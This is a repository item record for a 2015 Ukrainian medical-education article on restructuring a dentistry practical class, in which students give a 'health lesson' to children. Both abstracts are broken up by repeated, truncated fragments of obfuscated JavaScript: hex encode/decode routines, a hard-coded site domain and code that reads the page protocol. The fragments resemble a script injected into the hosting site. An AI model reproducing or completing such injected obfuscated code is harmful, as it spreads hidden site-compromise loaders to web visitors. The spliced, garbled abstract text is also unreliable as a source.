Show simple item record

АДАПТАЦІЯ МЕТОДИЧНИХ МАТЕРІАЛІВ ДО ПРАКТИЧНОГО ЗАНЯТТЯ НА ТЕМУ “ПРОВЕДЕННЯ УРОКУ ЗДОРОВ’Я” НА ІІІ КУРСІ СТОМАТОЛОГІЧНОГО ФАКУЛЬТЕТУ ДЛЯ ПІДВИЩЕННЯ ЙОГО ПРАКТИЧНОГО СПРЯМУВАННЯ

dc.creatorMelnychuk, G. M.
dc.creatorKostyuk, I. R.
dc.creatorShovkova, N. I.
dc.creatorBazalytska, O. V.
dc.creatorBabenko, A. D.
dc.creatorBilyshchuk, M. V.
dc.creatorPotyak, O. Y.
dc.creatorKoshkin, O. E.
dc.creatorYavorska, O. I.
dc.creatorAvakov, V. V.
dc.date2015-12-15
dc.date.accessioned2019-08-26T19:43:40Z
dc.date.available2019-08-26T19:43:40Z
dc.identifierhttps://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5319
dc.identifier10.11603/me.v0i4.5319
dc.identifier.urihttps://repository.tdmu.edu.ua/handle/123456789/11459
dc.descriptionThere are advantages of the credit-module system , but at practical lessons some principles might be skip . According to the  program of “Prophylaxis of stomatological disorders” at the III course of stomatological faculty the subject of  the practical lesson № 17-18 is a conduction of the “Health lesson” that should be managed within four academic hours. This practical lesson should be held in the organized children’s groups. To enhance its practical guide we have introduce some changes to the “Part VI. Plan and management of the lesson” at the Pediatric Stomatology Department of Ivano-Frankivsk National Medical University. The dress rehearsal is operated before the lesson instead of the test control and oral part and the main part is a performance itself. Besides, the initial and the final level of the test control should be administer at the previous lesson. Therefore, such innovation of methodical materials meets all practical requirements and provides the students and pedagogues with massive options of creativity.  // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;een-US
dc.descriptionКредитно-модульна система освіти має свої переваги, але є практичні заняття, на яких необхідно відступити від деяких її принципів. На ІІІ курсі стоматологічного факультету при вивченні предмета “Профілактика стоматологічних захворювань” згідно з робочою програмою є практичне заняття № 17-18 на тему “Проведення уроку здоров’я”, на яке відводиться чотири академічні години. Це заняття передбачає роботу студентів в організованих дитячих колективах. Із метою повного його практичного спрямування на кафедрі дитячої стоматології Івано-Франківського національного медичного університету внесено зміни в “Розділ VI. План і організаційна структура заняття” до цієї методичної розробки, що полягають у проведенні генеральної репетиції уроку здоров’я замість опитування і тестування, а основна частина заняття відводиться на власне виступ – урок здоров’я. При цьому вихідний та кінцевий рівень знань студентів викладач з’ясовує на попередньому занятті. Проведена нами адаптація методичних матеріалів допомагає отримати повне практичне спрямування цього практичного заняття та дозволяє студентам і викладачу цілком віддатися творчій праці.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;euk-UA
dc.formatapplication/pdf
dc.languageukr
dc.publisherTernopil State Medical Universityuk-UA
dc.relationhttps://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5319/4888
dc.rightsАвторське право (c) 2015 Медична освітаuk-UA
dc.sourceMedical Education; No 4 (2015)en-US
dc.sourceМедична освіта; № 4 (2015)uk-UA
dc.source2414-5998
dc.source1681-2751
dc.source10.11603/me.v0i4
dc.titleADAPTATION OF METHODICAL MATERIALS FOR PRACTICAL CLASS “HAELTH LESSON” AT THE III COURSE OF THE STOMATOLOGICAL FACULTY REGARDING THE IMPROVEMENT OF ITS PRACTICAL FOCUSen-US
dc.titleАДАПТАЦІЯ МЕТОДИЧНИХ МАТЕРІАЛІВ ДО ПРАКТИЧНОГО ЗАНЯТТЯ НА ТЕМУ “ПРОВЕДЕННЯ УРОКУ ЗДОРОВ’Я” НА ІІІ КУРСІ СТОМАТОЛОГІЧНОГО ФАКУЛЬТЕТУ ДЛЯ ПІДВИЩЕННЯ ЙОГО ПРАКТИЧНОГО СПРЯМУВАННЯuk-UA
dc.typeinfo:eu-repo/semantics/article
dc.typeinfo:eu-repo/semantics/publishedVersion


Files in this item

FilesSizeFormatView

There are no files associated with this item.

This item appears in the following Collection(s)

Show simple item record